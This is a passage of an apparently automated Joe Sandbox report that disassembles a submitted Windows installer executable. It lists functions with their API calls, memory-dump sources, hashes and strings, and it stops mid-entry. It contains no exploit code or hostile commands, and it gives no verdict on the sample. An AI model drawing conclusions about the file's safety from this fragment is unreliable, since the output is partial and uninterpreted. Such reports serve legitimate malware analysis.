                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                  • Instruction ID: c2d777d08f91faa28cc29f4af1d325e94f95b1c5ec16d27d51274fd7273dd8ba
                                                  • Opcode Fuzzy Hash: 5a4ae33423394c5bea169515a796ff1213356ce6b05ba1201df3d6212e3a5333
                                                  • Instruction Fuzzy Hash: A4E18971A04709DFDB24CF59C880BAAB7F1EB44305F15852EE497AB2D1D778AA91CF04
                                                  Function 004043B4 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204windowstringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404452
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404466
                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404483
                                                  • GetSysColor.USER32(?), ref: 00404494
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A2
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B0
                                                  • lstrlenW.KERNEL32(?), ref: 004044B5
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C2
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044D7
                                                  • GetDlgItem.USER32(?,0000040A), ref: 00404530
                                                  • SendMessageW.USER32(00000000), ref: 00404537
                                                  • GetDlgItem.USER32(?,000003E8), ref: 00404562
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045A5
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 004045B3
                                                  • SetCursor.USER32(00000000), ref: 004045B6
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 004045CF
                                                  • SetCursor.USER32(00000000), ref: 004045D2
                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404601
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404613
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: +C@$Call$N
                                                  • API String ID: 3103080414-3697844480
                                                  • Opcode ID: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                  • Instruction ID: 544d3524579c470af9434eda2f0c3a81960274dfcdaaec18bef3a5beb83851d9
                                                  • Opcode Fuzzy Hash: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
                                                  • Instruction Fuzzy Hash: 0C6192B1A00209BFDB109F60DD85AAA7B79FB84345F00843AF605B72D0D779A951CFA8
                                                  Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32(?,?), ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,00433EE0,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                  • Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
                                                  • Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
                                                  • Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4
                                                  Function 00405ECE Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406069,?,?), ref: 00405F09
                                                  • GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F12
                                                    • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
                                                    • Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B
                                                  • GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F2F
                                                  • wsprintfA.USER32 ref: 00405F4D
                                                  • GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405F88
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F97
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
                                                  • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406025
                                                  • GlobalFree.KERNEL32(00000000), ref: 00406036
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603D
                                                    • Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\3507071243740008011.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                    • Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %ls=%ls$[Rename]
                                                  • API String ID: 2171350718-461813615
                                                  • Opcode ID: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
                                                  • Instruction ID: 79e357045524b81a8ea21183b2a6189fe473d9766cb3db532b5e95eed637b89f
                                                  • Opcode Fuzzy Hash: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
                                                  • Instruction Fuzzy Hash: D1315771100B05ABD220AB669D48F6B3A9CDF45744F15003FF902F62D2EA7CD9118ABC
                                                  Function 00406516 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3507071243740008011.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
                                                  • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
                                                  • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3507071243740008011.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
                                                  • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\3507071243740008011.exe",0040334E,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: "C:\Users\user\Desktop\3507071243740008011.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-1114763981
                                                  • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                  • Instruction ID: 662237d401549a0b86d5a4e6e01ff77a7750504751085e1aca306c60b5ffe750
                                                  • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                  • Instruction Fuzzy Hash: 3911B655800612A5D7303B18BC40AB776B8EF68750B52403FED8A732C5E77C5CA286BD
                                                  Function 0040427E Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040429B
                                                  • GetSysColor.USER32(00000000), ref: 004042B7
                                                  • SetTextColor.GDI32(?,00000000), ref: 004042C3
                                                  • SetBkMode.GDI32(?,?), ref: 004042CF
                                                  • GetSysColor.USER32(?), ref: 004042E2
                                                  • SetBkColor.GDI32(?,?), ref: 004042F2
                                                  • DeleteObject.GDI32(?), ref: 0040430C
                                                  • CreateBrushIndirect.GDI32(?), ref: 00404316
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                  • Instruction ID: b3876bbcbbff373df079470ccdc5149205509338ab7e68b668f4883140def8c6
                                                  • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                  • Instruction Fuzzy Hash: B22151B1600704ABCB219F68DE08B5BBBF8AF41714F04897DFD96E26A0D734E944CB64
                                                  Function 100022D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                    • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                  • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2647896166.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2647879368.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2647911414.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2647926767.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                  • String ID: @Hmu
                                                  • API String ID: 4216380887-887474944
                                                  • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                  • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                                  • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                                  • Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65
                                                  Function 004052E6 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • lstrlenW.KERNEL32(0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                  • lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,74DF23A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                  • lstrcatW.KERNEL32(0042C228,0040325E,0040325E,0042C228,00000000,0041D800,74DF23A0), ref: 00405341
                                                  • SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID:
                                                  • API String ID: 2531174081-0
                                                  • Opcode ID: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
                                                  • Instruction ID: 0b7e0c68d9dca976d3f5af37e2abe0e5b3dfc86658143eccbc3f009734cc3570
                                                  • Opcode Fuzzy Hash: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
                                                  • Instruction Fuzzy Hash: 3F21A171900518BACF11AFA5DD859CFBFB4EF85350F14817AF944B6290C7B98A90CFA8
                                                  Function 00404BB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BCB
                                                  • GetMessagePos.USER32 ref: 00404BD3
                                                  • ScreenToClient.USER32(?,?), ref: 00404BED
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFF
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C25
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                  • Instruction ID: fcc096391eddebe8eb85a5aa76d4b30f922b4a39187f2a8acbab72006efdbce5
                                                  • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                  • Instruction Fuzzy Hash: 31015E71900218BAEB10DB94DD85BFEBBBCAF95B11F10412BBA50B62D0D7B499418BA4
                                                  Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                  • MulDiv.KERNEL32(000F0CEB,00000064,000F0EEF), ref: 00402E20
                                                  • wsprintfW.USER32 ref: 00402E30
                                                  • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                  Strings
                                                  • verifying installer: %d%%, xrefs: 00402E2A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: verifying installer: %d%%
                                                  • API String ID: 1451636040-82062127
                                                  • Opcode ID: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                  • Instruction ID: 0244175548504e0de7267acb57bf05e9e9b1595e8d7e84e5cb6d98a661a40fbb
                                                  • Opcode Fuzzy Hash: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                  • Instruction Fuzzy Hash: B6014470640208BBDF209F50DE49FAA3B69BB00304F008039FA46A51D0DBB889558B59
                                                  Function 100024A4 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                  • GlobalFree.KERNEL32(?), ref: 1000256D
                                                  • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2647896166.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2647879368.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2647911414.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2647926767.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Global$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 1780285237-0
                                                  • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                  • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                  • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                  • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                  Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                                  • GlobalFree.KERNEL32(?), ref: 00402950
                                                  • GlobalFree.KERNEL32(00000000), ref: 00402963
                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
                                                  • Instruction ID: c7dec26b55dd312fec5fb3faf1598927ec34475db9096b9e5e75d52a628400f5
                                                  • Opcode Fuzzy Hash: f62c8856deeff081086e792091e27b9e6cd03f1654503537dfa884b98f73c81c
                                                  • Instruction Fuzzy Hash: E521BDB1C00128BBDF216FA5DE49D9E7E79EF08364F10423AF964762E0CB794C418B98
                                                  Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsy62D9.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsy62D9.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
